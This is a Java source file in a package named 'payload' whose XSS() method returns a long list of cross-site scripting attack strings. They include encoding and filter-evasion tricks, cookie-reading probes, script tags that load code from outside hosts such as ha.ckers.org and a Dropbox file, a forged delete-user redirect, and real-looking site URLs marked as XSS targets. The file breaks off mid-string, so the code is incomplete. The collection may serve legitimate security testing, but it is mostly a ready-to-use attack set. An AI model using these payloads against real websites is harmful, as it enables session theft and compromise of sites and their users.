/*
 * To change this license header, choose License Headers in Project Properties.
 * To change this template file, choose Tools | Templates
 * and open the template in the editor.
 */
package payload;

import java.util.ArrayList;

/**
 *
 * @author Shaco JX
 */
public class A3p_7 {

    public ArrayList<String> XSS() {
        ArrayList<String> list = new ArrayList<>();
        String payload = "<embed type=\"image\" src=%(scriptlet)s></embed>\n"
                + "<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]<![CDATA[cript:javascript:alert(1);\">]]</C><X></xml>\n"
                + "<IMG SRC=&{javascript:alert(1);};>\n"
                + "<a href=\"jav&#65ascript:javascript:alert(1)\">test1</a>\n"
                + "<a href=\"jav&#97ascript:javascript:alert(1)\">test1</a>\n"
                + "<embed width=500 height=500 code=\"data:text/html,<script>%(payload)s</script>\"></embed>\n"
                + "<iframe srcdoc=\"&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>\">\n"
                + "';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//\";\n"
                + "alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--\n"
                + "></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\n"
                + "'';!--\"<XSS>=&{()}\n"
                + "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>\n"
                + "<IMG SRC=\"javascript:alert('XSS');\">\n"
                + "<IMG SRC=javascript:alert('XSS')>\n"
                + "<IMG SRC=JaVaScRiPt:alert('XSS')>\n"
                + "<IMG SRC=javascript:alert(\"XSS\")>\n"
                + "<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>\n"
                + "<a onmouseover=\"alert(document.cookie)\">xxs link</a>\n"
                + "<a onmouseover=alert(document.cookie)>xxs link</a>\n"
                + "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">\n"
                + "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\n"
                + "<IMG SRC=# onmouseover=\"alert('xxs')\">\n"
                + "<IMG SRC= onmouseover=\"alert('xxs')\">\n"
                + "<IMG onmouseover=\"alert('xxs')\">\n"
                + "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>\n"
                + "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\n"
                + "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\n"
                + "<IMG SRC=\"jav ascript:alert('XSS');\">\n"
                + "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">\n"
                + "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">\n"
                + "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">\n"
                + "perl -e 'print \"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\";' > out\n"
                + "<IMG SRC=\" &#14;  javascript:alert('XSS');\">\n"
                + "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\n"
                + "<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>\n"
                + "<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >\n"
                + "<SCRIPT SRC=//ha.ckers.org/.j>\n"
                + "<IMG SRC=\"javascript:alert('XSS')\"\n"
                + "<iframe src=http://ha.ckers.org/scriptlet.html <\n"
                + "\\\";alert('XSS');//\n"
                + "</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>\n"
                + "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">\n"
                + "<BODY BACKGROUND=\"javascript:alert('XSS')\">\n"
                + "<IMG DYNSRC=\"javascript:alert('XSS')\">\n"
                + "<IMG LOWSRC=\"javascript:alert('XSS')\">\n"
                + "<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS</br>\n"
                + "<IMG SRC='vbscript:msgbox(\"XSS\")'>\n"
                + "<IMG SRC=\"livescript:[code]\">\n"
                + "<BODY ONLOAD=alert('XSS')>\n"
                + "<BGSOUND SRC=\"javascript:alert('XSS');\">\n"
                + "<BR SIZE=\"&{alert('XSS')}\">\n"
                + "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">\n"
                + "<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">\n"
                + "<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>\n"
                + "<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">\n"
                + "<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>\n"
                + "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>\n"
                + "<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">\n"
                + "exp/*<A STYLE='no\\xss:noxss(\"*//*\");xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>\n"
                + "<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>\n"
                + "<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>\n"
                + "<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>\n"
                + "<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>\n"
                + "<XSS STYLE=\"xss:expression(alert('XSS'))\">\n"
                + "<XSS STYLE=\"behavior: url(xss.htc);\">\n"
                + "¼script¾alert(¢XSS¢)¼/script¾\n"
                + "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">\n"
                + "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">\n"
                + "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">\n"
                + "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\n"
                + "<IFRAME SRC=# onmouseover=\"alert(document.cookie)\"></IFRAME>\n"
                + "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>\n"
                + "<TABLE BACKGROUND=\"javascript:alert('XSS')\">\n"
                + "<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">\n"
                + "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">\n"
                + "<DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\">\n"
                + "<DIV STYLE=\"background-image: url(&#1;javascript:alert('XSS'))\">\n"
                + "<DIV STYLE=\"width: expression(alert('XSS'));\">\n"
                + "<BASE HREF=\"javascript:alert('XSS');//\">\n"
                + " <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>\n"
                + "<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>\n"
                + "<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>\n"
                + "<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->\n"
                + "<? echo('<SCR)';echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>\n"
                + "<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">\n"
                + "Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser\n"
                + "<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">\n"
                + " <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-\n"
                + "<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<A HREF=\"http://66.102.7.147/\">XSS</A>\n"
                + "<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>\n"
                + "<A HREF=\"http://1113982867/\">XSS</A>\n"
                + "<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>\n"
                + "<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>\n"
                + "<A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>\n"
                + "<iframe  src=\"&Tab;javascript:prompt(1)&Tab;\">\n"
                + "<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'\n"
                + "<input/onmouseover=\"javaSCRIPT&colon;confirm&lpar;1&rpar;\"\n"
                + "<sVg><scRipt >alert&lpar;1&rpar; {Opera}\n"
                + "<img/src=`` onerror=this.onerror=confirm(1) \n"
                + "<form><isindex formaction=\"javascript&colon;confirm(1)\"\n"
                + "<img src=``&NewLine; onerror=alert(1)&NewLine;\n"
                + "<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>\n"
                + "<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?\n"
                + "<iframe/src=\"data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">\n"
                + "<script /**/>/**/alert(1)/**/</script /**/\n"
                + "&#34;&#62;<h1/onmouseover='\\u0061lert(1)'>\n"
                + "<iframe/src=\"data:text/html,<svg &#111;&#110;load=alert(1)>\">\n"
                + "<meta content=\"&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)\" http-equiv=\"refresh\"/>\n"
                + "<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script\n"
                + "<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}\n"
                + "<meta http-equiv=\"refresh\" content=\"0;url=javascript:confirm(1)\">\n"
                + "<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>\n"
                + "<form><a href=\"javascript:\\u0061lert&#x28;1&#x29;\">X\n"
                + "</script><img/*/src=\"worksinchrome&colon;prompt&#x28;1&#x29;\"/*/onerror='eval(src)'>\n"
                + "<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>\n"
                + "<form><iframe &#09;&#10;&#11; src=\"javascript&#58;alert(1)\"&#11;&#10;&#09;;>\n"
                + "<a href=\"data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"&#09;&#10;&#11;>X</a\n"
                + "http://www.google<script .com>alert(document.location)</script\n"
                + "<a&#32;href&#61;&#91;&#00;&#93;\"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;\">XYZ</a\n"
                + "<img/src=@&#32;&#13; onerror = prompt('&#49;')\n"
                + "<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;\n"
                + "<script ^__^>alert(String.fromCharCode(49))</script ^__^\n"
                + "</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(\n"
                + "&#00;</form><input type&#61;\"date\" onfocus=\"alert(1)\">\n"
                + "<form><textarea &#13; onkeyup='\\u0061\\u006C\\u0065\\u0072\\u0074&#x28;1&#x29;'>\n"
                + "<script /***/>/***/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')/***/</script /***/\n"
                + "<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>\n"
                + "<a href=\"javascript:void(0)\" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>\n"
                + "<script ~~~>alert(0%0)</script ~~~>\n"
                + "<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>\n"
                + "<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN\n"
                + "<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)\n"
                + "&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'\n"
                + "&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}\n"
                + "<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^\n"
                + "<div/style=\"width:expression(confirm(1))\">X</div> {IE7}\n"
                + "<iframe// src=javaSCRIPT&colon;alert(1)\n"
                + "//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//\n"
                + "/*iframe/src*/<iframe/src=\"<iframe/src=@\"/onload=prompt(1) /*iframe/src*/>\n"
                + "//|\\\\ <script //|\\\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\\\ </script //|\\\\\n"
                + "</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>\n"
                + "<a/href=\"javascript:&#13; javascript:prompt(1)\"><input type=\"X\">\n"
                + "</plaintext\\></|\\><plaintext/onmouseover=prompt(1)\n"
                + "</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}\n"
                + "<a href=\"javascript&colon;\\u0061&#x6C;&#101%72t&lpar;1&rpar;\"><button>\n"
                + "<div onmouseover='alert&lpar;1&rpar;'>DIV</div>\n"
                + "<iframe style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\">\n"
                + "<a href=\"jAvAsCrIpT&colon;alert&lpar;1&rpar;\">X</a>\n"
                + "<embed src=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">\n"
                + "<object data=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">\n"
                + "<var onmouseover=\"prompt(1)\">On Mouse Over</var>\n"
                + "<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>\n"
                + "<img src=\"/\" =_=\" title=\"onerror='prompt(1)'\">\n"
                + "<%<!--'%><script>alert(1);</script -->\n"
                + "<script src=\"data:text/javascript,alert(1)\"></script>\n"
                + "<iframe/src \\/\\/onload = prompt(1)\n"
                + "<iframe/onreadystatechange=alert(1)\n"
                + "<svg/onload=alert(1)\n"
                + "<input value=<><iframe/src=javascript:confirm(1)\n"
                + "<input type=\"text\" value=`` <div/onmouseover='alert(1)'>X</div>\n"
                + "<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>\n"
                + "<img src=`xx:xx`onerror=alert(1)>\n"
                + "<object type=\"text/x-scriptlet\" data=\"http://jsfiddle.net/XLE63/ \"></object>\n"
                + "<meta http-equiv=\"refresh\" content=\"0;javascript&colon;alert(1)\"/>\n"
                + "<math><a xlink:href=\"//jsfiddle.net/t846h/\">click\n"
                + "<embed code=\"http://businessinfo.co.uk/labs/xss/xss.swf\" allowscriptaccess=always>\n"
                + "<svg contentScriptType=text/vbs><script>MsgBox+1\n"
                + "<a href=\"data:text/html;base64_,<svg/onload=\\u0061&#x6C;&#101%72t(1)>\">X</a\n"
                + "<iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE>\n"
                + "<script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+\n"
                + "<script/src=\"data&colon;text%2Fj\\u0061v\\u0061script,\\u0061lert('\\u0061')\"></script a=\\u0061 & /=%2F\n"
                + "<script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/XSS/)></script\n"
                + "<object data=javascript&colon;\\u0061&#x6C;&#101%72t(1)>\n"
                + "<script>+-+-1-+-+alert(1)</script>\n"
                + "<body/onload=&lt;!--&gt;&#10alert(1)>\n"
                + "<script itworksinallbrowsers>/*<script* */alert(1)</script\n"
                + "<img src ?itworksonchrome?\\/onerror = alert(1)\n"
                + "<svg><script>//&NewLine;confirm(1);</script </svg>\n"
                + "<svg><script onlypossibleinopera:-)> alert(1)\n"
                + "<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe\n"
                + "<script x> alert(1) </script 1=2\n"
                + "<div/onmouseover='alert(1)'> style=\"x:\">\n"
                + "<--`<img/src=` onerror=alert(1)> --!>\n"
                + "<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>\n"
                + "<div style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\" onclick=\"alert(1)\">x</button>\n"
                + "\"><img src=x onerror=window.open('https://www.google.com/');>\n"
                + "<form><button formaction=javascript&colon;alert(1)>CLICKME\n"
                + "<math><a xlink:href=\"//jsfiddle.net/t846h/\">click\n"
                + "<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>\n"
                + "<iframe src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"></iframe>\n"
                + "<a href=\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\">Click Me</a>\n"
                + "'';!--\"<XSS>=&{()}\n"
                + "'>//\\\\,<'>\">\">\"*\"\n"
                + "'); alert('XSS\n"
                + "<script>alert(1);</script>\n"
                + "<script>alert('XSS');</script>\n"
                + "<IMG SRC=\"javascript:alert('XSS');\">\n"
                + "<IMG SRC=javascript:alert('XSS')>\n"
                + "<IMG SRC=javascript:alert('XSS')>\n"
                + "<IMG SRC=javascript:alert(&quot;XSS&quot;)>\n"
                + "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">\n"
                + "<scr<script>ipt>alert('XSS');</scr</script>ipt>\n"
                + "<script>alert(String.fromCharCode(88,83,83))</script> \n"
                + "<img src=foo.png onerror=alert(/xssed/) />\n"
                + "<style>@im\\port'\\ja\\vasc\\ript:alert(\\\"XSS\\\")';</style>\n"
                + "<? echo('<scr)'; echo('ipt>alert(\\\"XSS\\\")</script>'); ?>\n"
                + "<marquee><script>alert('XSS')</script></marquee>\n"
                + "<IMG SRC=\\\"jav&#x09;ascript:alert('XSS');\\\">\n"
                + "<IMG SRC=\\\"jav&#x0A;ascript:alert('XSS');\\\">\n"
                + "<IMG SRC=\\\"jav&#x0D;ascript:alert('XSS');\\\">\n"
                + "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\n"
                + "\"><script>alert(0)</script>\n"
                + "<script src=http://yoursite.com/your_files.js></script>\n"
                + "</title><script>alert(/xss/)</script>\n"
                + "</textarea><script>alert(/xss/)</script>\n"
                + "<IMG LOWSRC=\\\"javascript:alert('XSS')\\\">\n"
                + "<IMG DYNSRC=\\\"javascript:alert('XSS')\\\">\n"
                + "<font style='color:expression(alert(document.cookie))'>\n"
                + "<img src=\"javascript:alert('XSS')\">\n"
                + "<script language=\"JavaScript\">alert('XSS')</script>\n"
                + "<body onunload=\"javascript:alert('XSS');\">\n"
                + "<body onLoad=\"alert('XSS');\"\n"
                + "[color=red' onmouseover=\"alert('xss')\"]mouse over[/color]\n"
                + "\"/></a></><img src=1.gif onerror=alert(1)>\n"
                + "window.alert(\"Bonjour !\");\n"
                + "<div style=\"x:expression((window.r==1)?'':eval('r=1;\n"
                + "alert(String.fromCharCode(88,83,83));'))\">\n"
                + "<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>\n"
                + "\"><script alert(String.fromCharCode(88,83,83))</script>\n"
                + "'>><marquee><h1>XSS</h1></marquee>\n"
                + "'\">><script>alert('XSS')</script>\n"
                + "'\">><marquee><h1>XSS</h1></marquee>\n"
                + "<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=javascript:alert('XSS');\\\">\n"
                + "<META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=javascript:alert('XSS');\\\">\n"
                + "<script>var var = 1; alert(var)</script>\n"
                + "<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>\n"
                + "<?='<SCRIPT>alert(\"XSS\")</SCRIPT>'?>\n"
                + "<IMG SRC='vbscript:msgbox(\\\"XSS\\\")'>\n"
                + "\" onfocus=alert(document.domain) \"> <\"\n"
                + "<FRAMESET><FRAME SRC=\\\"javascript:alert('XSS');\\\"></FRAMESET>\n"
                + "<STYLE>li {list-style-image: url(\\\"javascript:alert('XSS')\\\");}</STYLE><UL><LI>XSS\n"
                + "perl -e 'print \\\"<SCR\\0IPT>alert(\\\"XSS\\\")</SCR\\0IPT>\\\";' > out\n"
                + "perl -e 'print \\\"<IMG SRC=java\\0script:alert(\\\"XSS\\\")>\\\";' > out\n"
                + "<br size=\\\"&{alert('XSS')}\\\">\n"
                + "<scrscriptipt>alert(1)</scrscriptipt>\n"
                + "</br style=a:expression(alert())>\n"
                + "</script><script>alert(1)</script>\n"
                + "\"><BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>\n"
                + "[color=red width=expression(alert(123))][color]\n"
                + "<BASE HREF=\"javascript:alert('XSS');//\">\n"
                + "Execute(MsgBox(chr(88)&chr(83)&chr(83)))<\n"
                + "\"></iframe><script>alert(123)</script>\n"
                + "<body onLoad=\"while(true) alert('XSS');\">\n"
                + "'\"></title><script>alert(1111)</script>\n"
                + "</textarea>'\"><script>alert(document.cookie)</script>\n"
                + "'\"\"><script language=\"JavaScript\"> alert('X \\nS \\nS');</script>\n"
                + "</script></script><<<<script><>>>><<<script>alert(123)</script>\n"
                + "<html><noalert><noscript>(123)</noscript><script>(123)</script>\n"
                + "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">\n"
                + "'></select><script>alert(123)</script>\n"
                + "'>\"><script src = 'http://www.site.com/XSS.js'></script>\n"
                + "}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>\n"
                + "<SCRIPT>document.write(\"XSS\");</SCRIPT>\n"
                + "a=\"get\";b=\"URL\";c=\"javascript:\";d=\"alert('xss');\";eval(a+b+c+d);\n"
                + "='><script>alert(\"xss\")</script>\n"
                + "<script+src=\">\"+src=\"http://yoursite.com/xss.js?69,69\"></script>\n"
                + "<body background=javascript:'\"><script>alert(navigator.userAgent)</script>></body>\n"
                + "\">/XaDoS/><script>alert(document.cookie)</script><script src=\"http://www.site.com/XSS.js\"></script>\n"
                + "\">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>\n"
                + "src=\"http://www.site.com/XSS.js\"></script>\n"
                + "data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=\n"
                + "!--\" /><script>alert('xss');</script>\n"
                + "<script>alert(\"XSS by \\nxss\")</script><marquee><h1>XSS by xss</h1></marquee>\n"
                + "\"><script>alert(\"XSS by \\nxss\")</script>><marquee><h1>XSS by xss</h1></marquee>\n"
                + "'\"></title><script>alert(\"XSS by \\nxss\")</script>><marquee><h1>XSS by xss</h1></marquee>\n"
                + "<img \"\"\"><script>alert(\"XSS by \\nxss\")</script><marquee><h1>XSS by xss</h1></marquee>\n"
                + "<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>\n"
                + "\"><script>alert(1337)</script>\"><script>alert(\"XSS by \\nxss</h1></marquee>\n"
                + "'\"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>\n"
                + "<iframe src=\"javascript:alert('XSS by \\nxss');\"></iframe><marquee><h1>XSS by xss</h1></marquee>\n"
                + "'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=\"\" alt='\n"
                + "\"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=\"\" alt=\"\n"
                + "\\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src=\"\" alt=\\'\n"
                + "http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??\n"
                + "http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??\n"
                + "'); alert('xss'); var x='\n"
                + "\\\\'); alert(\\'xss\\');var x=\\'\n"
                + "//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));\n"
                + ">\"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>\n"
                + "<img src=\"Mario Heiderich says that svg SHOULD not be executed trough image tags\" onerror=\"javascript:document.write('\\u003c\\u0069\\u0066\\u0072\\u0061\\u006d\\u0065\\u0020\\u0073\\u0072\\u0063\\u003d\\u0022\\u0064\\u0061\\u0074\\u0061\\u003a\\u0069\\u006d\\u0061\\u0067\\u0065\\u002f\\u0073\\u0076\\u0067\\u002b\\u0078\\u006d\\u006c\\u003b\\u0062\\u0061\\u0073\\u0065\\u0036\\u0034\\u002c\\u0050\\u0048\\u004e\\u0032\\u005a\\u0079\\u0042\\u0034\\u0062\\u0057\\u0078\\u0075\\u0063\\u007a\\u0030\\u0069\\u0061\\u0048\\u0052\\u0030\\u0063\\u0044\\u006f\\u0076\\u004c\\u0033\\u0064\\u0033\\u0064\\u0079\\u0035\\u0033\\u004d\\u0079\\u0035\\u0076\\u0063\\u006d\\u0063\\u0076\\u004d\\u006a\\u0041\\u0077\\u004d\\u0043\\u0039\\u007a\\u0064\\u006d\\u0063\\u0069\\u0050\\u0069\\u0041\\u0067\\u0043\\u0069\\u0041\\u0067\\u0049\\u0044\\u0078\\u0070\\u0062\\u0057\\u0046\\u006e\\u005a\\u0053\\u0042\\u0076\\u0062\\u006d\\u0078\\u0076\\u0059\\u0057\\u0051\\u0039\\u0049\\u006d\\u0046\\u0073\\u005a\\u0058\\u004a\\u0030\\u004b\\u0044\\u0045\\u0070\\u0049\\u006a\\u0034\\u0038\\u004c\\u0032\\u006c\\u0074\\u0059\\u0057\\u0064\\u006c\\u0050\\u0069\\u0041\\u0067\\u0043\\u0069\\u0041\\u0067\\u0049\\u0044\\u0078\\u007a\\u0064\\u006d\\u0063\\u0067\\u0062\\u0032\\u0035\\u0073\\u0062\\u0032\\u0046\\u006b\\u0050\\u0053\\u004a\\u0068\\u0062\\u0047\\u0056\\u0079\\u0064\\u0043\\u0067\\u0079\\u004b\\u0053\\u0049\\u002b\\u0050\\u0043\\u0039\\u007a\\u0064\\u006d\\u0063\\u002b\\u0049\\u0043\\u0041\\u004b\\u0049\\u0043\\u0041\\u0067\\u0050\\u0048\\u004e\\u006a\\u0063\\u006d\\u006c\\u0077\\u0064\\u0044\\u0035\\u0068\\u0062\\u0047\\u0056\\u0079\\u0064\\u0043\\u0067\\u007a\\u004b\\u0054\\u0077\\u0076\\u0063\\u0032\\u004e\\u0079\\u0061\\u0058\\u0042\\u0030\\u0050\\u0069\\u0041\\u0067\\u0043\\u0069\\u0041\\u0067\\u0049\\u0044\\u0078\\u006b\\u005a\\u0057\\u005a\\u007a\\u0049\\u0047\\u0039\\u0075\\u0062\\u0047\\u0039\\u0068\\u005a\\u0044\\u0030\\u0069\\u0059\\u0057\\u0078\\u006c\\u0063\\u006e\\u0051\\u006f\\u004e\\u0043\\